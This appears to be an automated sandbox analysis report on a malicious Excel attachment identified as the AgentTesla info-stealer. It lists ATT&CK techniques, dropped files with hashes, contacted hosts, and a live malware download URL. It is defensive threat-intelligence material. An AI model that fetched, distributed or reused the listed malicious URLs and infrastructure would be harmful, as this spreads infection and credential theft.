
Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	Path Interception	Process Injection112	Disable or Modify Tools111	OS Credential Dumping1	File and Directory Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information31	Input Capture11	System Information Discovery114	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing12	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Timestomp1	NTDS	Security Software Discovery211	Distributed Component Object Model	Input Capture11	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading111	LSA Secrets	Virtualization/Sandbox Evasion13	SSH	Clipboard Data1	Data Transfer Size Limits	Application Layer Protocol32	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
gammavilla.org	0%	Virustotal		Browse
mail.gammavilla.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://127.0.0.1:	0%	Virustotal		Browse
http://127.0.0.1:	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://cps.letsencrypt.org0	0%	URL Reputation	safe
http://gammavilla.org	0%	Virustotal		Browse
http://gammavilla.org	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://191.96.149.225/new.exe	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	0%	URL Reputation	safe
http://mail.gammavilla.org	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://r3.i.lencr.org/0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gammavilla.org	217.174.152.38	true	true	0%, Virustotal, Browse	unknown
mail.gammavilla.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://191.96.149.225/new.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://127.0.0.1:	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
http://cps.letsencrypt.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://gammavilla.org	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false		high
http://r3.o.lencr.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.diginotar.nl/cps/pkioverheid0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/U	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.gammavilla.org	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://servername/isapibackend.dll	vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.entrust.net/2048ca.crl0	vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	false		high
http://cps.root-x1.letsencrypt.org0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://r3.i.lencr.org/0	vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
217.174.152.38	unknown	Bulgaria		31083	TELEPOINTBG	true
191.96.149.225	unknown	Chile		396073	MAJESTIC-HOSTING-01US	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	339305
Start date:	13.01.2021
Start time:	20:41:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0AX4532QWSA.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@6/12@16/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.3%) Quality average: 81% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 116 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 93.184.221.240, 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, apps.digsigtrust.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, apps.identrust.com, au-bg-shim.trafficmanager.net, wu.azureedge.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:42:07	API Interceptor	64x Sleep call for process: EQNEDT32.EXE modified
20:42:10	API Interceptor	1158x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
217.174.152.38	Swift Advice.exe	Get hash	malicious	Browse
	swift copy_pdf.exe	Get hash	malicious	Browse
	QUOTATION_PDF.gz.exe	Get hash	malicious	Browse
	Payment Swift_pdf.gz.exe	Get hash	malicious	Browse
	payment.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MAJESTIC-HOSTING-01US	SHIIb1tABn.exe	Get hash	malicious	Browse	38.68.46.205
	jUtUh49xpS.exe	Get hash	malicious	Browse	38.68.46.205
	DEC 10-12 Wire.xlsx	Get hash	malicious	Browse	104.37.175.25
	RFQ.20073555.xlsx	Get hash	malicious	Browse	104.37.175.25
	02_extracted.exe	Get hash	malicious	Browse	104.37.172.166
	document.docx	Get hash	malicious	Browse	104.37.172.209
	RFQ 202011655458794.exe	Get hash	malicious	Browse	191.96.140.245
	Statement 04 Oct-20.img.jar	Get hash	malicious	Browse	104.37.174.230
	Statement 04 Oct-20.img.jar	Get hash	malicious	Browse	104.37.174.230
	PO-HH00890.exe	Get hash	malicious	Browse	191.101.130.254
	Remittance Advice 06 Nov_20.jar	Get hash	malicious	Browse	104.37.174.230
	Remittance Advice 06 Nov_20.jar	Get hash	malicious	Browse	104.37.174.230
	Request Quote_PDF.exe	Get hash	malicious	Browse	104.37.172.166
	P.O-NH807686.exe	Get hash	malicious	Browse	191.101.130.254
	MtFzNM6dBT.exe	Get hash	malicious	Browse	104.37.172.166
	Price.exe	Get hash	malicious	Browse	104.37.172.166
	http://www.radiokart.com/wp-content/plugins/Epsonscannedimg009208-04-20.jar	Get hash	malicious	Browse	191.101.130.49
	RFQ-PO-#075609-MT002-08-05-20-Order_Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
	RFQ-PO-0075609-MT002-08-05-20-Order_Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
	PO-0576879-0025-MT-Order_Quote-Specfication,xlxs.exe	Get hash	malicious	Browse	104.37.175.147
TELEPOINTBG	INV8222874744_20210111490395.xlsm	Get hash	malicious	Browse	217.174.149.3
	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.123186963792904
Encrypted:	false
SSDEEP:	6:kKTYCwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mkPlE99SNxAhUegeT2
MD5:	32E596D60B1420543D1489D6B5044A34
SHA1:	C67E6926E3CBF559CC6DDD1C5A8D3BBBFF03381C
SHA-256:	4423C7932F2489469DBA6E865A892EE43064AB538CCABACE961A67180A3CD543
SHA-512:	C384DEC0E12F6C04ADC5EF60D6DB3A129AD3405BA0163BD323C3E96DD825B8E21989915AAC1AD47767AB58F2666FC84A833F03308933CA8141D60DEFE2F67929
Malicious:	false
Reputation:	low
Preview:	p...... ...........=...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.010594871269615
Encrypted:	false
SSDEEP:	3:kkFklhMPIlfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKbPOliBAIdQZV7eAYLit
MD5:	5CEF381E0214BC424AC5B78FDCAF75CA
SHA1:	54581BE4387033BC4E5A8F2F6582ADB99942040B
SHA-256:	44EB8AB261977454BF1E64CAE389AC2D899EE93C92623CF4E3E85F638A56E656
SHA-512:	2096464EE4482D5CEF6329124214F641AE57F661AEA50D9EE2CED98DC825872044941EF31DF2EBC438E403CC5AC2D083C9A1C40463BD2A3B74F491CCFAD1C6C0
Malicious:	false
Reputation:	low
Preview:	p...... ....`....2 N=...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	812032
Entropy (8bit):	7.920094533275065
Encrypted:	false
SSDEEP:	12288:yvNFVgCBX3xTqRv2RVozqB6Gnw3OvLS19TTPshs+nEQqkmyaIIQFq:MFVR352+DQSRW193sTnEdPy3
MD5:	72B76DB11728DD92AA4C3CB45F155B05
SHA1:	743E9F3600FD98E8F73F0E61DF6EDB1571BD4523
SHA-256:	469EF5404A9F75003F9A50A94BFBBBC339F1F649275FEE87C102F72D4F97443E
SHA-512:	705A3ED3401AF991B0548164B2C5D66A28B86CE57F11685C71A6B47935EC79DB53056E9EDFC8E3458CC7B6168D8452B4AFC918E5AF8051942DC5068F08E9A7C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://191.96.149.225/new.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..Z...........y... ........@.. ....................................@.................................<y..O................................... y............................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................py......H...........\.......K...@K...-...........................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....".(.......0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26ECC369.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\825E1F08.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1099960
Entropy (8bit):	2.015315507528159
Encrypted:	false
SSDEEP:	3072:hXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:/ahIFdyiaT2qtXw
MD5:	C7141BC7A8B7E57597F8B4911CAE00A3
SHA1:	802966622B3360818CA9F46E0477DABD3AB1C417
